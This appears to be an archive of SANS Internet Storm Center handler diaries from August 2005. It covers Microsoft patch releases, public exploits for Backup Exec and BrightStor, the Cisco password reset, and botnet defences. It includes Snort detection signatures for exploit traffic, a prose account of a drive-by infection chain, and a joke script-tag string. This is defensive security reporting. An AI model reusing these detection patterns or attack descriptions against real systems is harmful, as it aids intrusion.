EXPLOIT COM Object Instantiation Memory Corruption Vulnerability (group
2)"; flow:established,from_server; flowbits:isset,CLSID_DETECTED;
classtype:web-application-attack; reference:cve,2005-1990;
sid:2002172; rev:2;)

EXPLOIT COM Object Instantiation Memory Corruption Vulnerability (group
3)"; flow:established,from_server; flowbits:isset,CLSID_DETECTED;
classtype:web-application-attack; reference:cve,2005-1990;
sid:2002173; rev:2;)

-- Handler on Duty,

Published: 2005-08-11

* Veritas Backup Exec 0-day; POC code available for multiple updated MS vulns; P2P on the Vista

ISCAlert has been activated (that blinking globe thing) to warn people about
MS05-039 related activity that may go critical over the weekend. Three
seperate exploits for the UPnP issue have been released over the last 24 hours.
Please patch your systems if you haven't already. Thank you.

FrSIRT has released an advisory containing what they call "Veritas Backup Exec Windows Agent Remote File Access Exploit (0day)"

The ISC has already seen an increase in scans for port 10000, and advise any users of Backup Exec deny access to that port from all untrusted networks. Frank Knobbe has made available a rough draft signature that may help identify attempts against B.E.:

alert tcp $EXTERNAL_NET any -> $HOME_NET 10000 (msg:"BLEEDING-EDGE Veritas \
Backup Exec Windows Agent Remote File Access Exploit"; \
flow:to_server,established; \
content:"|b4 b8 0f 26 20 5c 42 34 03 fc ae ee 8f 91 3d 6f|"; \
reference:url,www.frsirt.com/english/advisories/2005/1387; \
reference:url,www.frsirt.com/exploits/20050811.backupexec_dump.pm.php; \
classtype:string-detect; sid:2002176; rev:1;)

Thanks, Frank!

POC code available for multiple updated MS vulns

The vulnerabilities addressed in MS005-038, MS005-039, MS05-040 and MS-043, all covered in this month's Fat Tuesday festivities, AKA
, have fallen victim already to publicly released exploits. Both bugtraq and Daily Dave have postings today announcing the availability of said code. Now, I haven't built or tested any of it, so I can't personally vouch for the effectiveness ot any of it, but if it isn't working as intended you can bet it will be shortly. Patch up, folks.

P2P on the Vista

We received some packets today from someone who was chomping at the bit to get his Windows Vista up and on the wire, and was in for an interesting surprise. After a short while, he was being barraged with a good number of UDP port 53186 packets from around the globe. A bit of digging gave me an education in Teredo - Microsoft's IPv6 over IPv4 encapsulation, discussed in:
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/teredo.mspx and RFC3904. Teredo's strength is it's ability to traverse NAT firewalls while maintaining the protections offered by IPv6, and it has been used to build tunnels for plenty of OSes and applications, including Windows P2P and especially the Peer Name Resolution Protocol, PRNP.

Gee, George, why do I care? Well, Tommy, there are wonderful things waiting just around the corner...let me show you.

From "Introduction to Windows Peer-to-Peer Networking":

"P2P PNRP uses multiple clouds, in which a cloud is a grouping of computers that use addresses of a specific scope. A scope is an area of the network over which the address is unique. PNRP clouds are based on the address scopes for IPv6 addresses."

Now, to test the scalability of some new PNRP features, Microsoft has decided to turn on prnpauto, or PNRP Auto Registration, by default in Vista beta. Boot up your shiny new Vista and a PNRP name gets generated & out goes the registration. Now come the name resolvers a-knockin'. Bingo! Instant anomaly IDS test!

If you aren't all too happy with this arrangement, feel free to kill it off using the Task Manager or "net stop pnrpauto". My advise is to do this before ever putting the box on the wire. Otherwise, it may take some time for the cloud to realize that you aren't playing anymore and the traffic will continue.

Many thanks to Noah Horton for helping the ISC get a handle on what was going on. He also made a blog entry discussing this a bit further at: http://blogs.msdn.com/noahh/




Published: 2005-08-10

Patch Refresher; MS05-038 Issues

Patch Refresher

Okay, what else would follow a patch Tuesday, but a chaotic Wednesday. Just as a refresher on the patches were dealing with:

Bulletin Severity Impact

MS05-038 Critical Elevation of Privilege
MS05-039 Critical Remote Code Execution and
Elevation of Privilege
MS05-040 Important Remote Code Execution
MS05-041 Moderate Denial of Service
MS05-042 Moderate Denial of Service,
Information Disclosure,
and Spoofing
MS05-043 Critical Remote Code Execution

For a more in depth review, please see Cory's great diary from yesterday found at http://isc.sans.org/diary.php?date=2005-08-09

MS05-038 Issues

It seems that there are issues with downloading the MS05-038 patch and it appears as unavailable. Many thanks to Rick Hoppe who pointed us to the following information found at http://blogs.technet.com/msrc/default.aspx

"Not long after we released this morning, we found out that many of the digital signatures on some of the IE updates for MS05-038 were corrupted and were preventing install. This only impacts those downloading from the Download Center, not Windows Update, Microsoft Update, SUS, or WSUS. At least now we know what the problem is and it should be fixed soon. "

The message that I received when I tried to download it read:

"The download you requested is unavailable. If you continue to see this message when trying to access this download, go to the "Search for a Download" area on the Download Center home page."

We'll keep you posted as we learn more. It looks to be another interesting day in the world of network security.

Lorna Hutcheson

Handler on Duty



Published: 2005-08-09

Black Tuesday Patch Roundup, Panic and/or Mayhem ensues

Microsoft Security Bulletins for August

Happy Black Tuesday, kids! We've got six bulletins for your patching pleasure, so let's get right to it. We'll be updating this throughout the day as we have more time to intepret the bulletins and analyze the patches, but here's a quick overview to stave off the impending flood of "August MS Patches are ONLINE" emails. ;)

Update: We've got writeups on each patch below - expect more details to emerge over the next few days.

Bulletin Severity Impact

MS05-038 Critical Elevation of Privilege
MS05-039 Critical Remote Code Execution and
Elevation of Privilege
MS05-040 Important Remote Code Execution
MS05-041 Moderate Denial of Service
MS05-042 Moderate Denial of Service,
Information Disclosure,
and Spoofing
MS05-043 Critical Remote Code Execution

MS05-038: Arbitrary code execution vulnerabilities in Internet Explorer

Severity: Critical


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

* 98, 98SE, and ME

Affected Components:

* Internet Explorer 5.01 SP4 -> 6 Service Pack 1 on various Windows platforms


* MS05-025

* MS05-037

fixes multiple vulnerabilities in Internet Explorer which can be exploited to run arbitrary code. Some of the fixed vulnerabilities have already been disclosed publicly.

Handler chatter:

The handlers are of the opinion that of the bulletins released today, this is the avenue most likely to be explored (or the avenue currently being explored) by purveyors of malware. While image rendering vulnerabilites have led to cacophonous cries of "The worms are coming! The worms are coming!" in the past, we believe that there is a far greater likelihood of these flaws being exploited to drop relatively immobile malcode: spyware, bots, and other decidedly non-viral badness.

Update: Minutes prior to posting this, proof of concept code for the latter of the three vulnerabilites covered under the 038 banner went public. Hope you're patched, or using something other than IE. ;)

MS05-039: Arbitrary code execution vulnerability in Plug and Play

Severity: Critical


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

fixes a vulnerability in Plug and Play which can be exploited to run arbitrary code. The risk presented by this vulnerability varies across different versions of Windows.

* On XP Service Pack 2 and 2003 Server systems, the vulnerability is ONLY exposed to an attacker logged on to the system locally.

* On XP Service Pack 1, the vulnerability is ALSO exposed to remote users with valid logon credentials.

* On Windows 2000 SP4 systems, this vulnerability can ALSO be exploited by anonymous attackers. A valid login is not required.

Handler chatter:

Users shouldn't face too much external exposure, as the exploitation vector in this case is the old Microsoft standard (TCP 139 & 445), but internal networks could be at risk. Based on the language in the bulletin and the
, this vulnerability is a standard stack-based buffer overflow. Exploitation is described in the X-Force alert as "trivial."

MS05-040: Arbitrary code execution vulnerability in Windows Telephony Service

Severity: Important


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

fixes a vulnerability in Windows Telephony Service which can be remotely exploited to run arbitrary code. On 2000 Professional and XP (i.e. Microsoft's 'non-server' systems) this vulnerability is limited to a local privilege escalation. On Microsoft's server operating systems that are not actively running this service, this vulnerability is limited to a local privilege escalation. On Server 2003 the vulnerability is only exposed to authenticated users. This leaves 2000 Server as the most exposed in this case.

Handler chatter:

Since this vulnerability occurs in the Telephony Application Programming Interface (TAPI), many third party applications may be making use of this service without the user's or administrator's explicit knowledge. The service can be started by a non-privileged user. According to the bulletin, TAPI is used for any number of voice, data, and video communications, including but not limited to teleconferencing, caller-id features, voice mail, and more. Anyone using Windows-based software to perform any of these functions should probably place this one higher on the priority stack.

MS05-041: Denial of Service Vulnerability in Remote Desktop/Remote Assistance

Severity: Moderate


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

This update resolves a newly-discovered, privately-reported vulnerability. A vulnerability in the Remote Desktop Protocol (RDP) exists that could allow an attacker to cause a system to stop responding. The vulnerability is documented in the “Vulnerability Details” section of this bulletin.

Handler chatter:

MS labels this as moderate because remote desktop service (rdp or termina services) are not enabled by default. However many admins enable RDP for administration on and remote assistance requests expose this service until the request expires making the application of this patch essential for most environments. Additionally, there are circumstances where RDP is enabled by default; for example, in Media Center Editions of XP.

There was
on this back in early July when this was released at the time the POC code was not public, it is public now though. There was some chatter on the indicating that this could possibly be leveraged into an exploit, but the nuances of Windows kernel exploitation are out of the reach of all but the Most High Hackers. eEye came out several weeks ago and nothing more. Who's right? Who knows. If it's not just a DoS it wouldn't be the first time an unexploitable DoS had been exploited.

MS05-042: Kerberos vulnerabilities

Severity: Moderate


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

Kerberos hitchhikes onto all windows active domains, it's not something optionally installed.

Microsoft dubbed the answer to all security bulletin '

Vulnerabilities in Kerberos could allow denial of service, Information disclosure and spoofing'.

This is actually a two vulnerabilities into one package deal:
and .


Microsoft rates it as medium and states the worst thing that could happen is that the Active Domain would stop authenticating users. It seems to involve a well aimed packet at the domain controller, causing it to reboot after a one minute countdown.

Valid user credentials are required and windows 2000 and 2003 servers are affected.

Now we don't want the earth to get leveled but neither do we what the users whining about not being able to log in, do we? Add to that that rebooting servers are a real pain as well.

Shielding TCP and UDP port 88 from hostile networks might help 'till you get your towel and apply the patch.


If you use smart cards in your domain, it would mean you value security enough to deploy a two factor authentication. As such you're unlikely to really appreciate some monkey in the middle type attack that can happen if you have enabled smart card technology the

The impact can be very broad as the attacker (who needs a valid account with smart card) gains rights of others users.

Hence this really is for you if you use smart cards to authenticate your users on your windows domain.

Note: The Vogons point out there are no workarounds known to them, we'll take their word for it.

MS05-043: Vulnerability in Print Spooler Service Could Allow Remote Code Execution

Severity: Critical


Affected Systems:

* 2000 SP 4

* XP SP1 & 2 (32-bit)

* Server 2003 & Server 2003 (Itanium) w/o service packs.


This patch addresses a buffer overflow in the print spooler service, which is spoolsv.exe. For Windows 2000 and Windows XP SP1, any anonymous user could attempt to exploit this vulnerability. For Windows XP SP2 and Windows Server 2003, the user would need to be authenticated.

Thanks to helpful handlers!

The diary is usually a collaborative effort, but on MS Patch Day, the collaboration reaches a new level. I'd like to thank all of the handlers for their assistance today - I'd rattle off a litany of names, but you know who you are. Thanks!

Opportunites squandered

Astute readers may have noticed my absence from diary duties of late. I've been traveling and training all over the damn place for what seems like forever, and I had planned on doing a write-up on my most recently attended event, the week-long blur known as BlackHat/DEFCON, but I mistakenly volunteered to take the hotseat on the second Tuesday of the month. My thrilling tales will have to wait for another day, interpid fans, but rest assured, thrilling tales they be!

Until that day, happy patching!


Cory Altheide


Handler On Duty


Mistook their nods for an approval

Just ignore the smoke and smile

* Just so you don't miss it, make sure to check out Handler William Salusky's
Published: 2005-08-08

Deep Rants; CYA from botnets to phisherZ ; Malware Acquisition postponed

Deep Rants

It's a pitiful state of affairs. That is, balancing the day job with the vain attempt to keep one's finger on the pulse of the net consisting of limited reports sourcing from the minority of security clueful. It's sad to say but today is not much different, it's more of the same; bots, spam, phish, malicious code, those who fall for it, compromised hosts at non-responsive hosting providers, dev-nulled abuse mailboxes, open egress/ingress policies, SNMP foolishness, lack of validation before publication, *BREATHE*, AntiVirus updates without technical detail, unenforced AUPs, nonexistant AUPs, identity theft, corporate information loss, SOX and HIPAA violations, false positives, zero patch management and mailing list FUD... And No, I'm not Denis Leary.
Seriously. I can't address every issue that I rant about, but I've selected one that I deal with frequently.

CYA - Protecting your corporate "assets"

In addition to handler status, I'm a member of a response team that frequently handles corporate network incident response involving malicious code... namely bots. We have a short list of mitigations that resonate in every incident and find that implementation of these risk mitigators can go a long way toward reducing if not preventing future outbreaks. These protective measures are not exhaustive, but can be deployed at a higher tier in your architecture further removed from managing the host level. I'm not going to talk about workstation security policies, or the gimme of running up to date and active AntiVirus products, and no reference will be given to running host level application firewalls.

What can be done?

Centralize network egress If you haven't already consolidated your access to the Internet, fighting the botnet fight will be that much harder if your networks have many paths to the public Internet at large.
Employ Egress filtering Block everything going out to the world that is unnecessary for business. Policies are a good candidate for a new bullet point, so if you don't have them currently in place develop them. Do you connect to windows fileshares on the net? Block outbound access. Do you tftp gets and puts to the net? Block outbound access. Better yet, start from scratch and block everything, Establish your minimum outbound networking requirements, allow just that, and require all new connectivity to navigate an access request process. Force web traffic through restrictive proxy servers, arbitrary outbound TCP port 80 and 443 is a nightmare waiting to happen, or maybe just waiting for you to discover.
Centralize your logging Without easy access to logging from Firewalls, VPN concentrators and other network devices finding the threat from within becomes unnecessarily complicated. If you have identified a botnet controller on the net, you can quickly build a map of compromises of your network by identifying all connections to the malicious host(s). You can also identify possible secondary stage payload infections through the analysis of connectivity sourcing from infected hosts to internet destinations shared by the whole of your infection base.
Deploy Intrusion Sensors Finding the traditional IRC based botnet with intrusion sensor technology is easy and unending fun. Really. Unending fun. HTTP and UDP based bots get a bit trickier but are not impossible to detect, but for time and space I'm choosing not going to get into that at this moment. I personally love to watch IRC "JOIN" and "PRIVMSG" sensor alerts. You of course should modify your signatures to look for IRC communication on ALL ports not just IRC default ports, many botnet operators choose TCP ports including 443, 5190, 8080 and potentially anywhere in the 64K range for managing their botnets. Come to think of it, I don't think I've seen a port 0 botnet controller. :)
Establish flexible routing control You should have strong control of your horizontal as well as your vertical. Once a malicious controller has been identified, cut off access to the controller by advertising a null route across your network to make short work of it, this provides some breathing room to your people on the street that have the problem of physical access involved in malware response. If you have absolute remote network administrative control of every node on your network, it's that much better for you. With additional network routing tricks instead of null routing, you can control traffic path and get into some more complicated but very exciting areas of sinkholing and Honeynet technology which I'm very passionate about. However, I'm not opening that can of worms in this forum for the complexity and legal issues that I'm sure many would be quick to offer me an earful.
DNS - Blackholes, Poisoning and Reporting Botnet control is a mobile threat. If you have control of your DNS infrastructure you can protect your networks by intentionally poisoning "your" internal resolvers. You can establish zone files for known malicious botnet controller hostnames that would effectively prevent botnet herding miscreants from gaining control of any botted hosts on your network through the update of DNS records which could evade your null route on any previously known botnet controller IP by for EXAMPLE simply pointing the DNS A record for badbot.botcontroller.net to Control of DNS makes sinkholing your botted infrastructure a trivial task. It's worth mentioning if you have the ability to take control of IP on your network, dynamic DNS hosting providers have seemingly taken to using that IP as the blackhole for DNS records used primarily in the control of bots. If you log queries, you can determine the DNS A records behind the IP you discovered bots connecting to. If you can't enable full logging, investigate the possibility of employing Passive DNS query logging that will not provide you with a one to one match of client request to hostname query, but can still provide historical IP to name record matches.
I imagine some folks will be a little bit miffed regarding the lack of technical and how-to detail in the above statements, but I'm expecting that we'll be able to expand and dive into detail for the specific topics listed above in future diaries. This is just the starting point.
With a little bit of help I'm sure we could make this a minimum of a top 10 list for botnet fighting strategies. Help us flesh it out, you are welcome to provide us with some examples of what you do to actively protect your networks from botnets and the random, ever present malicious code threat.
-With Respect and tribute to Carl Douglas, "Everybody was BotNet Fighting...".

Malware Response - part 2 postponed

In my <A HREF="http://isc.sans.org/diary.php?date=2005-06-13">last diary</A> I mentioned that in my next diary (the one you are reading) I would offer response techniques leveraging the use of SBD as a malware acquisition tool. Well, I didn't really want to be called a liar, but I've earned the title. Next diary, I will most definitely provide at least a brief procedure that is by no means perfect when it comes to identifying every case of infectious/malicious code, but in my experience and the thousands of machines I've investigated, only a handful of hosts required any closer inspection to acquire malicious code samples. BTW, We haven't receive any reader input on remote command line response techniques, so I have to imagine it must be that you forgot to hit send on that draft email. It's okay, don't be shy. Go back to your drafts folder and hit send. Everybody's doing it.

William Salusky

wsalusky at gmail dot com

Handler on Duty (heh heh...)


Published: 2005-08-07

postcard.gif.exe; virus numbers!; IE7.beta warez bugged; Black Tuesday: be prepared

Thanks Chris!

Chris sent us some packets, which fellow handler George Bakos took and discovered what looks like a weird bug out of in some equipment. We've notified the vendor and will follow up on it but promised to keep it under wraps till appropriate to speak about it.
If it turns out to be more widespread than it appears now, we might decide to
act otherwise at such time.

So please, do send it weird unexplained packets, some of us eat them for breakfast.

You'll be making the Internet a better place. This is also why Chris deserves his 5 minutes of fame.


Ian sent in the incoming email of some spam claiming to be a postcard and an analysis he did of the referenced critter.
A virustotal scan I ran later today has the usual diverse names. Moreover it gets that void look in the eye of some anti-virus software.

Scan results
File: postcard.gif.exe
Date: 08/07/2005 21:09:18 (CET)
AntiVir found [BDS/Zapchast.2]
Avast 4.6.695.0/20050805 found [Win32:Jeefo]
AVG 718/20050807 found [Win32/Hidrag.A]
Avira found nothing
BitDefender 7.0/20050807 found [Trojan.Zapchas.F]
CAT-QuickHeal 7.03/20050807 found nothing
ClamAV devel-20050725/20050807 found [W32.Jeefo]
DrWeb 4.32b/20050807 found [Win32.HLLP.Jeefo.36352]
eTrust-Iris found nothing
eTrust-Vet found nothing
Fortinet found [IRC/Zapchast.4D53-bdr]
F-Prot 3.16c/20050805 found nothing
Ikarus found nothing
Kaspersky found [Backdoor.IRC.Cloner.ae]
McAfee 4551/20050805 found [Generic component]
NOD32v2 1.1187/20050805 found [IRC/Cloner.AS]
Norman 5.70.10/20050805 found nothing
Panda 8.02.00/20050807 found [W32/Jeefo]
Sophos 3.96.0/20050807 found [W32/Jeefo-A]
Sybari 7.5.1314/20050807 found [Backdoor.IRC.Cloner.ae]
Symantec 8.0/20050806 found nothing
TheHacker found [Trojan/Downloader.IstBar.gen]
VBA32 3.10.4/20050805 found [Backdoor.IRC.Zapchast]

There goes my faith in anti-virus software. Just kidding. Those folks are fighting an uphill battle that is by nature reactive as the bad guys have their tools just as we do.

So what more than to run a different brand of anti-virus software in the perimeter and on the desktop can you do ?

Start with user education. Some awareness training will do wonders.

Next make sure all windows desktops/laptops that are rolled out are set up to show extensions of all files so that the user does in fact have a chance to see the real name and get alarmed by the *.gif.exe once they went to that training telling them they'll get punished if they click on anything that looks like that.

Finally, try to filter messages where the formatting is such that the URL that the "a" tag refers to is different from the apparent URL inside the tag. Those message should be quarantined. Also avoid all of those double extension attachments and downloads whenever possible into an environment that is file extension sensitive such as windows.

Virus numbers!

The thing with these differing names for a single virus though is simply put: why do you need them? Well they are good to talk to somebody else. E.g. Melissa rings a bell doesn't it. But as the example above shows these names lead to nothing but confusion. "Yeah, I got to clean Jeefo."; "Good luck with that one, I just cleaned Zapchas.". Let alone the numbering/lettering used for the variants. Once these get beyond B it seems as if some count faster than others. This lack of sync causes people to only remember the name, not the version. But the payload, impact, clean up, ... of a virus can be quite different between these variants causing even more confusion.

So we could continue to argue -as customers- with our vendors and demand they synchronize it. Tried that, apparently it still doesn't work all that well in the real world, despite promises to the contrary.

The other thing with virus names is that it creates the chances for fame and glory for the author. "I wrote Mellissa" (no I didn't, but you'll get the meaning) is much more of an interesting statement at some hacker convention than "I wrote CXN-2001-0041".

So here goes my suggestion for you to like or dislike: Let's -as customers- demand that our suppliers switch to a system like the one used for vulnerabilities:

- CXN: Common eXploit Number

- CXC: Common eXploit Candidate

Once a CXN is issued everybody switches their CXC to a CXN. A CXN is exactly one variant of one exploit (such as a virus), proven by samples kept by that central ly.

Let's demand the vendors fund a little 3rd party organization that keeps the numbers in sync and if they are smart they can learn to share descriptions and the like (which do cost a lot of money to produce and gain us little as to exactly who made them as long as they are good enough).

At the same time the Internet at large gets rid of the fame and glory of the authors having a recognizable hook to get their trash in the press for their 15 minutes of fame.

Yes I'm taking the step to sweep viruses/worms/trojans/... all into a single "exploit" bin. It only makes sense as it all grows to the same thing anyway.

The next logical step would be to link exploits to vulnerabilities and there you have the birth of a relational database. That database could (eventually) expand to include vendor info such as which version is vulnerable, and what patch stops the vulnerability, creating a link between e.g. the IDS seeing an exploit and the admin relaxing as he sees the patch has already been deployed site wide for the associated vulnerability, and that the anti-virus reports it stopped it as well.

In Dutch there is a saying "hoop doet leven". It is hard to translate, but literally it is something like "hope makes living". But I'm not expecting the vendors to be thrilled about it. FUD does sell products in our field.

IE7.beta warez bugged?

Microsoft is rightfully restricting downloads of IE7's beta release. This creates a market for warez versions and Craig reported that one of those was bugged with spyware. It's a big download and a big thing to search through, so it's not (yet) confirmed by us.

But the generic advice to stay away from warez is easy to make. Aside from the legalities and ethics, you do not know what you get in your hands. It might erase everything, send spam in your name, erase all network shares it has access to, ... or it might do as advertised. How will you know?
You do know you got it from people telling you they don't mind to break the law and provide you with an illegal copy of some piece of software.
Now, who do you trust?

Black Tuesday: be prepared!

Next Tuesday will be a Microsoft patch day. Probably this will be causing a lot of reboots throughout the world.

An anonymous reader pointed out this blog:
. It contains experiences of locked up machines that have older APC software and might cause it to hang during a reboot due to an expired cert in a java runtime environment. Perhaps some preparation will safeguard you from jumping to the "blame those new patches" conclusion.

update: another anonymous reader gave us this URL from APC:
and which let us to find the writeup of sun on the issue at:

Swa Frantzen


Published: 2005-08-06

Malware URLs.

Malicious URLs

Its pretty obvious, that a lot of the malware these days arrives hidden behind a URL in an e-mail or an instant message. We would like to start collecting these URLs, and explore some automated methods to validate them and maybe report them.

This project is in 'pre beta' now, and help any is appreciated. The plan is to download any content from these URLs, and maybe one or two links down, run it through a virus checker for known 'bad stuff' and keep monitoring them for changes.

The URL (non malicious ;-) ) to report URLs is: http://isc.sans.org/urlcheck.php .

Things I am looking for:

- scripts to extract URLs from spam (or regular email)

- any regular expressions someone may have to look for malicious javascript
Ultimatly, a list of verfied malicious URLs will be made available. I also hope to release the 'check' script to distribute the checking of URLs.


Johannes Ullrich, jullrich\<script language="malicious">alert('dont spam')</script>@sans.org


Published: 2005-08-05

PHPbb Scanning; Information Leaks; Usenix Paper

PHPbb Scanning

In a to our forum, Andy Green reports observing a new version of the good old phpBB
highlight exploit. In this case the observed pattern is:


which looks like an attempt to just check quickly if the forum is vulnerable.
The attack is only effective against phpBB version 2.0.15. The current version is 2.0.17.

In a follow-up post, Sadie suggests to block the sources from which these attack originate via a .htaccess file. Evidently, the scans can amount to a DOS attack due to the frequency of the scans.

How to respond to Information Leaks

We received two very similar requests for help. In the first case, a user reports that they repeatedly received medical information from strangers via FAX due to a misdialed number.

Clearly, medical information is regulated by HIPAA. For fax machines, common implementation guidelines suggest to program frequently used numbers into the fax machines speed dial memory. In addition, all fax transmissions should include a confidentiality notice, asking the receiver to notify the sender, and destroy the fax, if the fax is misdirected.

In this particular case, the user notified the health care provider but the fax errors continued. For persistent cases like this, it may be necessary to notify the indivuduals whose information you received, or to inform local law enforcement.

The second case involved a user who received a scanned image of a check from an insurance. The check was a check he wrote to the insurance. His account number was visible and the e-mail was not encrypted.

Obviously, this is not a good idea. The user further asked if it is necessary to get a new bank account. While possible, it is unlikely that the information leaked. It is probably not worth the effort to change accounts. However, it is advised to review statements carefully even without such an incident.

Usenix paper

Congratulation to John Bethencourt, Jason Franklin and Mary Vernon for their award winning paper on mapping of internet sensors. A couple people asked how this affects DShield, I summarized a response in a quick blog entry at
http://johannes.homepc.org/blog .


Johannes Ullrich, SANS Institute

(Filling in for George Bakos)


Published: 2005-08-04

Email Ploy;Cisco Password Leak Source;Cisco CCO Password Reset Reply-To Spoof Concern;Patch Tuesday Preview;Windows 2000 SP4 Rollup 1 Re-Release

Email Ploy

[Brought to you by Lorna Hutcheson and Tom Liston]

We received several reports of an email circulating with links to a
news article that came with a surprise if you followed the links. DO
NOT GO TO THE FOLLOWING LINKS or any others from this site that may be
sent to you!!!





Each of the emails seem to have different links in them but associated
with the same site.

The subject of the email is "Iraq Bombinng - 140 marines killed" or
something similar to it. Yes the misspellings are from the actual
email and there are many other discrepancies and misspellings in the
version that we have seen. We received several reports but only one
person sent the actual email to look at. The misspellings alone are a
big indicator that something is not right. If you follow the links
you get taken to a news article that has obviously been modified and
pieced together. For example says 140 Marines were killed, however,
the actual news article found by googling for it has 14 as the number
killed. (Not in any way making light of the the numbers or the loss,
just pointing out the discrepancy).

Once you click on the link, you get their news article, but you also
set off a series of events that require no interaction from the

First off, there is an exploit on the page that takes advantage of
MS05-001 (Vulnerability in HTML Help Could Allow Code Execution) which
is just another cross-domain scripting vulnerability. This allows you
to get a file called ppp.hta from their website and is then launched
on your local harddrive. This then creates a file called netlog.exe
and and this appears to be launched on your local hard drive by using a combination of an ActiveX FileSystemObject and shell. Netlog.exe then goes and gets another file
called win32sba.exe, which is Robobot variant. Now your system can be
used for what ever malicious intent the folks who set this scheme up
had in mind.

The moral of this story is......Don't follow the link!!!!!

[Note: The above was updated to fix an error in our analysis. Thanks to Juergen Schmidt for pointing out our mistake.]

Cisco Password Leak Source

It appears the passwords could be leaked through the search engine.

from: http://www.cisco.com/security/

"Cisco Systems, Inc. was made aware of a vulnerability of a search tool on Cisco.com that could expose passwords for registered users."

Cisco CCO Password Reset Reply-To Spoof Concern

Testing confirmed a spoofed reply-to field in a message to the CCO Locksmith would be accepted.

We notified the Cisco PSIRT team and they are reviewing the spoofed
reply-to issue.

Patch Tuesday Preview

Next Patch Tuesday: 8/9/2005

6 bulletins (including one or more critical vulnerabilities)

Update to the Malicious Software Removal Tool

Important updates for the various update services

Fixes We're Hoping to See:



Windows 2000 SP4 Rollup 1 Re-Release


"If you are affected by these issues, we suggest that you do not install Update Rollup 1 for Windows 2000 SP4 until the corresponding hotfix is available. We plan to reissue Update Rollup 1 for Windows 2000 SP4 soon. Several hotfixes will be integrated into the new version of Update Rollup 1 for Windows 2000 SP4."

Helpful Tool of the Day

eWeek is reporting on the new MS Word Redaction Tool:



Robert Danford

SANS ISC Handler on Duty


Published: 2005-08-03

(Update #Last : 23:00GMT) Cisco! Pancho!; MetaMetasploit?; BrightStor Exploits/Scanner; It Takes a Village...; Mystery; GHH

Prologue: There isn't going to be a "Bouncing Malware" installment today. I've been mighty busy over the last week or so (anyone want to come help me sand the peeling stain off my deck?) and I've not had time to work on one. Soon. I promise.

Cisco CCO Password Issue

Ever have one of those days? Looks like Cisco is having one of those months... It appears that something has happened to compromise the passwords for their Cisco Connection Online service. What exactly happened? Cisco isn't saying.

Attempting to log into CCO brings up the following terse message:

* Cisco has determined that Cisco.com password protection has been
* As a precautionary measure, Cisco has reset your password. To receive
your new password, send a blank e-mail, from the account which you entered
upon registration, to cco-locksmith@cisco.com. Account details with a new
random password will be e-mailed to you.
* If you do not receive your new password within five minutes, please
contact the Technical Support Center.
* This incident does not appear to be due to a weakness in Cisco products
or technologies.

<crude_sarcasm> Note: I do, indeed, know what caused this issue, but I've been enjoined from disclosing it until next year's Black Hat. </crude_sarcasm>

Gotta love that last bullet point... It reinforces that old security maxim: All the technology in the world won't save you from doing something dumb.

Update: A tip o' the always stylish Handler-On-Duty propeller beanie goes out to Scott who wondered whether Cisco is having Pancho check for differences in the "From:" and "Reply-To:" addresses on messages to cco-locksmith@cisco.com before sending out a password. He is...

Follow the Bouncing... uh... ummm... Vulnerability?

Yesterday, we reported that there was a recently announced vulnerability in (can you say "ironic"?) Metasploit.

When we reported it, it was a vulnerability.

Then it wasn't....

Seems that the issue wasn't in Metasploit itself, but could be triggered if a vulnerable third-party terminal program was used along with Metasploit.

In keeping with Liston's Third Law ("The amount of Irony in the universe is a constant"), another real vulnerability popped up to take its place. It seems as though there is an issue in MSFWeb (the Metasploit Framework Web interface) that could allow for unauthorized access. Either run "msfupdate" or wait for version 2.5.0. (Thanks Gilles!)

ARCserve BrightStor Exploits/Scanner

Bringing forward this note from an early update to yesterday's diary 'cause it's important...:

If you haven't already patched your BrightStor ARCserve Backup
software, now would be a really good time. At least three different
exploit codes and the code for a scanner have now been released.
Links to patches can be found in
. Here is how CA rates this

Threat Assessment

Overall Risk: High
Impact: Critical
Popularity: Medium
Simplicity: Medium

If you don't think the kiddies are jumpin' on this one,
the spike in port 6070 activity.

(Thanks Lorna!)

It Takes a Village...

Just yesterday, I received a canned message from a vendor:

I'm updating my address book. Please take a moment to update your latest
contact information. Your information is stored in my personal address
book and will not be shared with anyone else. Plaxo is free, if you'd like
to give it a try."

This was followed by a listing of my contact information that he'd
sent to Plaxo and a link where I could sign up for his wonderful free
service too.

No, I'd rather not, thank you.

Over the past few years, I've noticed the rising tide of online "communities." And like some sort of unholy sludge, they've increasingly been floating across the Internet and seeping their way into my inbox.

Stop it.

Stop it now.

Both Plaxo and the recently discovered (for me) sms.ac entice users to "import and invite" their contacts. They make it easy, giving the clueless noobs step-by-step instructions on how to upload the contents of their contact lists.


Just don't.

If you happen to have someone's contact information, that person gave that contact information to you. If they wanted their information given to Plaxo or sms.ac, they would give it to them. Do you go around posting your friend's phone numbers on bathroom walls? Do you walk up to strangers on the street and give them Aunt Mildred's P.O. Box? How about your teenage daughter's IM identity?

Needless to say, Mr. Vendor (and his boss) got a quick phone call from me, wherein I pointed out my belief that some village somewhere must be missing its idiot.

Don't follow in his footsteps. Your village needs you...

...Workin' On Mysteries Without Any Clues...

Not as strange and mysterious as what you might find in the back of a '60 Chevy:


but interesting none-the-less.

(w/apologies to Mr. Seger)

Google Hack Honeypot

Interesting concept. Check it out


Tom Liston - Intelguardians Network Intelligence, LLC



Published: 2005-08-02

Diary Update for Cisco Greeting and ARCserve Exploits and Scanner; Regular Diary: Kismet / Metasploit / New Buffer overflows ARCserve/ New Nigerian Scam / Google update / PwStealers project / Power Ou

Diary update

Cisco Greeting

It has been reported and confirmed that folks attempting to log into Cisco's website were met with the following greeting:

"Cisco has determined that Cisco.com password protection has been compromised.

As a precautionary measure, Cisco has reset your password. To receive your new password, send a blank e-mail, from the account which you entered upon

registration, to cco-locksmith@cisco.com. Account details with a new random password will be e-mailed to you.

If you do not receive your new password within five minutes, please contact the Technical Support Center.

This incident does not appear to be due to a weakness in Cisco products or technologies"

It appears that this was limited in the scope and time that it was appearing. We don't have further details at this time. If anyone has any information
to add, please let us know

ARCserve Exploits and Scanner

If you haven't already patched your BrightStor ARCserve Backup software, now would be a really good time. At least three different exploit codes and the
code for a scanner have now been released. Farther down in the diary, you will see the links for where you can get your patches for these vulnerabilities.

Here is how CA rates this vulnerability

Threat Assessment

